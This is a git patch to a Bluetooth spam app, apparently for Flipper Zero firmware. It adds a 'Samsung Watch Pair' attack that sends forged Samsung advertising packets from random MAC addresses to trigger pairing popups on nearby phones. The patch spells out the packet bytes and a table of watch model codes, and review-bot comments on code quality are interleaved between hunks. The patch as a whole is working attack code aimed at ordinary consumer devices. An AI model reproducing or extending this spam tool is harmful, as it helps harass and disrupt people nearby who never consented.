From 4a97cb40b860b2e761f0bdfb776bdd726c6efaeb Mon Sep 17 00:00:00 2001
From: Willy-JL <49810075+Willy-JL@users.noreply.github.com>
Date: Sat, 21 Oct 2023 03:54:59 +0100
Subject: [PATCH] BLE Spam add Samsung Watch spam
---
 applications/external/ble_spam/ble_spam.c | 25 ++-
 .../external/ble_spam/protocols/smartthings.c | 198 ++++++++++++++++++
 .../external/ble_spam/protocols/smartthings.h | 4 +
 .../ble_spam/protocols/smartthings_scenes.h | 2 +
 4 files changed, 227 insertions(+), 2 deletions(-)
diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c
index d929a4f6c..ae5d761c1 100644
--- a/applications/external/ble_spam/ble_spam.c
+++ b/applications/external/ble_spam/ble_spam.c
@@ -88,7 +88,7 @@ static Attack attacks[] = {
 },
 },
 {
- .title = "Samsung Buds Pair",
+ .title = "Samsung Buds Popup",
 .text = "No cooldown, long range",
 .protocol = &protocol_smartthings,
 .payload =
@@ -96,7 +96,28 @@ static Attack attacks[] = {
 .random_mac = true,
 .cfg =
 {
- .smartthings = {},
+ .smartthings =
+ {
+ .type = SmartthingsTypeBuds,
+ .data = {},
+ },
+ },
+ },
+ },
+ {
+ .title = "Samsung Watch Pair",
+ .text = "No cooldown, long range",
+ .protocol = &protocol_smartthings,
+ .payload =
+ {
+ .random_mac = true,
+ .cfg =
+ {
+ .smartthings =
+ {
+ .type = SmartthingsTypeWatch,
+ .data = {},
+ },
 },
 },
 },
diff --git a/applications/external/ble_spam/protocols/smartthings.c b/applications/external/ble_spam/protocols/smartthings.c
index 61e91f5ea..d53f12846 100644
--- a/applications/external/ble_spam/protocols/smartthings.c
+++ b/applications/external/ble_spam/protocols/smartthings.c
@@ -21,8 +21,42 @@ const struct {
 };
 const uint8_t buds_models_count = COUNT_OF(buds_models);
+const struct {
+ uint8_t value;
+ const char* name;
+} watch_models[] = {
+ {0x01, "White Watch4 Classic 44"},
+ {0x02, "Black Watch4 Classic 40"},
+ {0x03, "White Watch4 Classic 40"},
+ {0x04, "Black Watch4 44mm"},
+ {0x05, "Silver Watch4 44mm"},
+ {0x06, "Green Watch4 44mm"},
+ {0x07, "Black Watch4 40mm"},
+ {0x08, "White Watch4 40mm"},
+ {0x09, "Gold Watch4 40mm"},
+ {0x0a, "French Watch4"},
+ {0x0b, "French Watch4 Classic"},
+ {0x0c, "Fox Watch5 44mm"},
+ {0x11, "Black Watch5 44mm"},
+ {0x12, "Sapphire Watch5 44mm"},
+ {0x13, "Purpleish Watch5 40mm"},
+ {0x14, "Gold Watch5 40mm"},
+ {0x15, "Black Watch5 Pro 45mm"},
+ {0x16, "Gray Watch5 Pro 45mm"},
+ {0x17, "White Watch5 44mm"},
+ {0x18, "White & Black Watch5"},
+ {0x1b, "Black Watch6 Pink 40mm"},
+ {0x1c, "Gold Watch6 Gold 40mm"},
+ {0x1d, "Silver Watch6 Cyan 44mm"},
+ {0x1e, "Black Watch6 Classic 43mm"},
+ {0x20, "Green Goofy"},
+ {0x1a, "Fallback Watch"},
+};
+const uint8_t watch_models_count = COUNT_OF(watch_models);
+
 static const char* type_names[SmartthingsTypeMAX] = {
 [SmartthingsTypeBuds] = "SmartThings Buds",
+ [SmartthingsTypeWatch] = "SmartThings Watch",
 };
 static const char* smartthings_get_name(const ProtocolCfg* _cfg) {
 const SmartthingsCfg* cfg = &_cfg->smartthings;
@@ -31,6 +65,7 @@ static const char* smartthings_get_name(const ProtocolCfg* _cfg) {
 static uint8_t packet_sizes[SmartthingsTypeMAX] = {
 [SmartthingsTypeBuds] = 31,
+ [SmartthingsTypeWatch] = 15,
 };
 void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const ProtocolCfg* _cfg) {
 const SmartthingsCfg* cfg = _cfg ? &_cfg->smartthings : NULL;
@@ -90,6 +125,31 @@ void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const Prot
 // Truncated AD segment, Android seems to fill in the rest with zeros
 break;
 }
+ case SmartthingsTypeWatch: {
+ uint8_t model;
+ if(cfg && cfg->data.watch.model != 0x00) {
+ model = cfg->data.watch.model;
+ } else {
+ model = watch_models[rand() % watch_models_count].value;
+ }
+
+ packet[i++] = 14; // Size
+ packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
+ packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
+ packet[i++] = 0x00; // ...
+ packet[i++] = 0x01;
+ packet[i++] = 0x00;
+ packet[i++] = 0x02;
+ packet[i++] = 0x00;
+ packet[i++] = 0x01;
+ packet[i++] = 0x01;
+ packet[i++] = 0xFF;
+ packet[i++] = 0x00;
+ packet[i++] = 0x00;
+ packet[i++] = 0x43;
+ packet[i++] = (model >> 0x00) & 0xFF;
+ break;
+ }
 default:
 break;
 }
@@ -102,6 +162,10 @@ enum {
 _ConfigBudsExtraStart = ConfigExtraStart,
 ConfigBudsModel,
 };
+enum {
+ _ConfigWatchExtraStart = ConfigExtraStart,
+ ConfigWatchModel,
+};
 static void config_callback(void* _ctx, uint32_t index) {
 Ctx* ctx = _ctx;
 SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
@@ -117,6 +181,16 @@ static void config_callback(void* _ctx, uint32_t index) {
 }
 break;
 }
+ case SmartthingsTypeWatch: {
+ switch(index) {
+ case ConfigWatchModel:
+ scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModel);
+ break;
+ default:
+ break;
+ }
+ break;
+ }
 default:
 break;
 }
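Review bot: In the `SmartthingsTypeWatch` case of `smartthings_make_packet`, the AD length byte `14` and the `[SmartthingsTypeWatch] = 15` entry added to `packet_sizes` are two independent literals that must both agree with the fifteen `packet[i++]` writes, and nothing visible checks that `i` ends at the allocated size. If a later edit changes one of them only, the writes would run past the buffer, assuming the buffer is sized from `packet_sizes` (the allocation is outside the hunk). Deriving the length from the table, `packet[i++] = packet_sizes[SmartthingsTypeWatch] - 1; // Size`, and asserting after the switch that `i` equals the chosen size would make a mismatch fail loudly instead of corrupting memory. The function starts and ends outside this hunk.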
@@ -133,6 +207,18 @@ static void buds_model_changed(VariableItem* item) {
 variable_item_set_current_value_text(item, "Random");
 }
 }
+static void watch_model_changed(VariableItem* item) {
+ SmartthingsCfg* cfg = variable_item_get_context(item);
+ uint8_t index = variable_item_get_current_value_index(item);
+ if(index) {
+ index--;
+ cfg->data.watch.model = watch_models[index].value;
+ variable_item_set_current_value_text(item, watch_models[index].name);
+ } else {
+ cfg->data.watch.model = 0x00;
+ variable_item_set_current_value_text(item, "Random");
+ }
+}
 static void smartthings_extra_config(Ctx* ctx) {
 SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
 VariableItemList* list = ctx->variable_item_list;
@@ -166,6 +252,32 @@ static void smartthings_extra_config(Ctx* ctx) {
 variable_item_set_current_value_text(item, model_name);
 break;
 }
+ case SmartthingsTypeWatch: {
+ item = variable_item_list_add(
+ list, "Model", watch_models_count + 1, watch_model_changed, cfg);
+ const char* model_name = NULL;
+ char model_name_buf[3];
+ if(cfg->data.watch.model == 0x00) {
+ model_name = "Random";
+ value_index = 0;
+ } else {
+ for(uint8_t i = 0; i < watch_models_count; i++) {
+ if(cfg->data.watch.model == watch_models[i].value) {
+ model_name = watch_models[i].name;
+ value_index = i + 1;
+ break;
+ }
+ }
+ if(!model_name) {
+ snprintf(model_name_buf, sizeof(model_name_buf), "%02X", cfg->data.watch.model);
+ model_name = model_name_buf;
+ value_index = watch_models_count + 1;
+ }
+ }
+ variable_item_set_current_value_index(item, value_index);
+ variable_item_set_current_value_text(item, model_name);
+ break;
+ }
 default:
 break;
 }
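Review bot: In `smartthings_extra_config`, the custom-model fallback sets `value_index = watch_models_count + 1`, but the item was created with `watch_models_count + 1` values, so the valid indices are 0 to `watch_models_count` and this one is past the end. `watch_model_changed` reads `watch_models[index]` after a single decrement with no bound check, so if the list widget ever hands that out-of-range index back to the callback the read lands one element past the table; whether it can is not visible here. A guard such as `if(index > watch_models_count) return;` before the decrement would close that. `watch_model_callback` in the scene hunk further down indexes `watch_models[index - 1]` in its `default` branch with the same missing check. `smartthings_extra_config` continues outside the hunk.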
@@ -268,3 +380,89 @@ void scene_smartthings_buds_model_custom_on_exit(void* _ctx) {
 cfg->data.buds.model = (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00);
 }
+
+static void watch_model_callback(void* _ctx, uint32_t index) {
+ Ctx* ctx = _ctx;
+ SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
+ switch(index) {
+ case 0:
+ cfg->data.watch.model = 0x00;
+ scene_manager_previous_scene(ctx->scene_manager);
+ break;
+ case watch_models_count + 1:
+ scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModelCustom);
+ break;
+ default:
+ cfg->data.watch.model = watch_models[index - 1].value;
+ scene_manager_previous_scene(ctx->scene_manager);
+ break;
+ }
+}
+void scene_smartthings_watch_model_on_enter(void* _ctx) {
+ Ctx* ctx = _ctx;
+ SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
+ Submenu* submenu = ctx->submenu;
+ uint32_t selected = 0;
+ bool found = false;
+ submenu_reset(submenu);
+
+ submenu_add_item(submenu, "Random", 0, watch_model_callback, ctx);
+ if(cfg->data.watch.model == 0x00) {
+ found = true;
+ selected = 0;
+ }
+ for(uint8_t i = 0; i < watch_models_count; i++) {
+ submenu_add_item(submenu, watch_models[i].name, i + 1, watch_model_callback, ctx);
+ if(!found && cfg->data.watch.model == watch_models[i].value) {
+ found = true;
+ selected = i + 1;
+ }
+ }
+ submenu_add_item(submenu, "Custom", watch_models_count + 1, watch_model_callback, ctx);
+ if(!found) {
+ found = true;
+ selected = watch_models_count + 1;
+ }
+
+ submenu_set_selected_item(submenu, selected);
+
+ view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
+}
+bool scene_smartthings_watch_model_on_event(void* _ctx, SceneManagerEvent event) {
+ UNUSED(_ctx);
+ UNUSED(event);
+ return false;
+}
+void scene_smartthings_watch_model_on_exit(void* _ctx) {
+ UNUSED(_ctx);
+}
+
+static void watch_model_custom_callback(void* _ctx) {
+ Ctx* ctx = _ctx;
+ scene_manager_previous_scene(ctx->scene_manager);
+ scene_manager_previous_scene(ctx->scene_manager);
+}
+void scene_smartthings_watch_model_custom_on_enter(void* _ctx) {
+ Ctx* ctx = _ctx;
+ SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
+ ByteInput* byte_input = ctx->byte_input;
+
+ byte_input_set_header_text(byte_input, "Enter custom Model");
+
+ ctx->byte_store[0] = (cfg->data.watch.model >> 0x00) & 0xFF;
+
+ byte_input_set_result_callback(
+ byte_input, watch_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
+
+ view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
+}
+bool scene_smartthings_watch_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
+ UNUSED(_ctx);
+ UNUSED(event);
+ return false;
+}
+void scene_smartthings_watch_model_custom_on_exit(void* _ctx) {
+ Ctx* ctx = _ctx;
+ SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
+ cfg->data.watch.model = (ctx->byte_store[0] << 0x00);
+}
diff --git a/applications/external/ble_spam/protocols/smartthings.h b/applications/external/ble_spam/protocols/smartthings.h
index 38717abd0..36c3e9e81 100644
--- a/applications/external/ble_spam/protocols/smartthings.h
+++ b/applications/external/ble_spam/protocols/smartthings.h
@@ -6,6 +6,7 @@
 typedef enum {
 SmartthingsTypeBuds,
+ SmartthingsTypeWatch,
 SmartthingsTypeMAX,
 } SmartthingsType;
@@ -15,6 +16,9 @@ typedef struct {
 struct {
 uint32_t model;
 } buds;
+ struct {
+ uint8_t model;
+ } watch;
 } data;
 } SmartthingsCfg;
diff --git a/applications/external/ble_spam/protocols/smartthings_scenes.h b/applications/external/ble_spam/protocols/smartthings_scenes.h
index d765e4922..d184880da 100644
--- a/applications/external/ble_spam/protocols/smartthings_scenes.h
+++ b/applications/external/ble_spam/protocols/smartthings_scenes.h
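Review bot: `case watch_models_count + 1:` in `watch_model_callback` uses a `const uint8_t` object in a case label, which is not an integer constant expression in ISO C and compiles only where the compiler folds it as an extension. Declaring the count as an enumerator, `enum { watch_models_count = COUNT_OF(watch_models) };`, keeps the name and makes the label portable, provided nothing outside this file refers to the object. In `scene_smartthings_watch_model_on_enter`, the `found = true;` inside the final `if(!found)` is a dead store and can be dropped.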
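Review bot: The new `watch.model` field in `SmartthingsCfg` carries no comment saying that `0x00` is reserved, yet `smartthings_make_packet`, `watch_model_changed` and the model scene all treat that value as the "Random" selection. A `00` typed into the custom byte input is therefore stored as the sentinel rather than as a model value, which is surprising without documentation. A field comment such as `// 0x00 = random entry from watch_models` would record the convention where the type is declared.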
@@ -1,2 +1,4 @@
 ADD_SCENE(smartthings_buds_model, SmartthingsBudsModel)
 ADD_SCENE(smartthings_buds_model_custom, SmartthingsBudsModelCustom)
+ADD_SCENE(smartthings_watch_model, SmartthingsWatchModel)
+ADD_SCENE(smartthings_watch_model_custom, SmartthingsWatchModelCustom)